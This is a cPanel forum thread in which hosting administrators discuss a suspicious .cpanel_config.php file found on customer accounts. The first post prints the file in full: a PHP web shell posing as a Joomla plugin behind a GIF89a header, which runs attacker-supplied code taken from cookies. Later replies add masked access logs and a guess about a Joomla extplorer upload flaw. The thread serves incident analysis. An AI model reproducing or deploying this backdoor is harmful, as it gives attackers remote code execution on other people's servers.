Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

File on some accounts with suspicious code .cpanel_config.php

Discussion in 'Security' started by speckados, Dec 18, 2013.

  1. speckados

    speckados Well-Known Member

    Joined:
    May 21, 2003
    Messages:
    330
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Pastrana :: Guadalajara :: España
    cPanel Access Level:
    DataCenter Provider
    Twitter:
    This night (00:00 to 05:00 GMT +1 at 18/12/2013) on some servers, and some accounts, a suspicious file named .cpanel_config.php on webroot

    content of file (i don't undestand)

    Code:
    GIF89a
<?php
/**
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 *
 * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
 * @license     GNU General Public License version 2 or later
 */
/**
 * Instant Suggest Ajax
 *
 * @package     Joomla.Plugin
 * @subpackage  system.instantsuggest
 * @since       3.1
 */
class PlgSystemInstantSuggest
{
	public function __construct() {
		$filter = @$_COOKIE['p3'];
		if ($filter) {
			$option = $filter(@$_COOKIE['p2']);
			$auth = $filter(@$_COOKIE['p1']);
			$option("/123/e",$auth,123);
			die();
		}
	}
}
    Somebody can explain about the code?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 speckados, Dec 18, 2013
  2. Infopro

    Infopro cPanel Sr. Product Evangelist Staff Member

    Joined:
    May 20, 2003
    Messages:
    16,877
    Likes Received:
    482
    Trophy Points:
    583
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    You might find this link helpful:
    /http://wordpress.org/plugins/instant-suggest/
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #2 Infopro, Dec 18, 2013
  3. speckados

    speckados Well-Known Member

    Joined:
    May 21, 2003
    Messages:
    330
    Likes Received:
    2
    Trophy Points:
    168
    Location:
    Pastrana :: Guadalajara :: España
    cPanel Access Level:
    DataCenter Provider
    Twitter:
    What interest there're on you link? Plugin of WP? Please extend your comments.

    Thanks.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #3 speckados, Dec 18, 2013
  4. Infopro

    Infopro cPanel Sr. Product Evangelist Staff Member

    Joined:
    May 20, 2003
    Messages:
    16,877
    Likes Received:
    482
    Trophy Points:
    583
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    That's where that plugin originally came from, I suspect. Or some version of it. You might download that version from the reputable site, wordpress.org at that link provided and check its files against the files on your server. You might also ask your users where this file was found, if they installed this plugin.

    If you suspect a security issue here and not sure what to do next, you might want to hire a professional to assist you with that. The cPanel AppCat should be helpful in locating someone:
    cPanel App Catalog

    That file, where ever it came from, is clearly not a cPanel file, or issue. My linking you to some place where you might find out more Info, should have been enough to assist you in the right direction.

    The rest of my suggestions here should already be a known thing, I think.


    I am interested to know why you'd post here on this forum about this though.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #4 Infopro, Dec 18, 2013
  5. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    997
    Likes Received:
    11
    Trophy Points:
    168
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    I have seen that file uploaded in many accounts in out servers.

    CXS (ConfigServer eXploit Scanner) detects and quarantines it.

    Seems that Joomla's extplorer component is used, but I have no idea how...

    As "first aid" I have password protected Joomla's administrator folder in those accounts.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #5 quietFinn, Dec 18, 2013
  6. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,356
    Likes Received:
    63
    Trophy Points:
    178
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    I concur with quietFinn... com_extplorer appears to be the target. I too have seen these attempts intercepted on many machines.

    Code:
    10.20.30.40 - - [18/Dec/2013:23:10:50 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 301 266 "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET /administrator/components/com_extplorer/ HTTP/1.1" 302 - "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET / HTTP/1.1" 200 69941 "-"
10.20.30.40 - - [18/Dec/2013:23:10:52 -0500] "POST / HTTP/1.1" 200 69619 "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:54 -0500] "POST / HTTP/1.1" 404 - "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:50 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 301 266 "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET /administrator/components/com_extplorer/ HTTP/1.1" 302 - "-"
10.20.30.40 - - [18/Dec/2013:23:10:51 -0500] "GET / HTTP/1.1" 200 69941 "-"
10.20.30.40 - - [18/Dec/2013:23:10:52 -0500] "POST / HTTP/1.1" 200 69619 "http://somedomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:23:10:54 -0500] "POST / HTTP/1.1" 404 - "http://somedomain.ext/administrator/components//com_extplorer/"

10.20.30.40 - - [18/Dec/2013:15:54:44 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 1128 "-"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:44 -0500] "GET /administrator/components//com_extplorer/ HTTP/1.1" 200 1128 "-"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
10.20.30.40 - - [18/Dec/2013:15:54:45 -0500] "POST /administrator/components//com_extplorer/ HTTP/1.1" 404 - "http://someotherdomain.ext/administrator/components//com_extplorer/"
    Given the GIF89a at the top, I suspect they are attempting to upload it to the server as a gif [because com_extplorer probably doesn't allow files with .php extensions to be uploaded] and then renaming it once it is on the server should they get that far.

    And yeah, I heavily massaged that log exerpt.

    M
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #6 mtindor, Dec 18, 2013
  7. caeos

    caeos Well-Known Member

    Joined:
    Jul 18, 2007
    Messages:
    79
    Likes Received:
    0
    Trophy Points:
    56
    Location:
    UK
    #7 caeos, Dec 19, 2013
(You must log in or sign up to post here.)
Loading...
Similar Threads - File accounts suspicious
  1. ca2236

    Accounts Backup log file?

    ca2236, Sep 11, 2018, in forum: Data Protection
    Replies:
    1
    Views:
    427
    cPanelLauren
    Sep 12, 2018
  2. Shood

    SOLVED Filezilla can't connect to all FTP accounts

    Shood, Jul 18, 2018, in forum: General Discussion
    Replies:
    7
    Views:
    1,946
    durangod
    Sep 10, 2018
  3. Sujoy Dhar

    Bulk Overwrite .htaccess file in all user accounts?

    Sujoy Dhar, Mar 31, 2018, in forum: General Discussion
    Replies:
    6
    Views:
    470
    cPanelMichael
    Apr 5, 2018
  4. ottdev

    Orphaned files from terminated accounts

    ottdev, Mar 3, 2018, in forum: Data Protection
    Replies:
    1
    Views:
    357
    cPanelMichael
    Mar 5, 2018
  5. gramzon

    All e-mail accounts have the same UID in passwd file

    gramzon, Dec 4, 2017, in forum: E-mail Discussion
    Replies:
    2
    Views:
    408
    cPanelMichael
    Dec 4, 2017

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice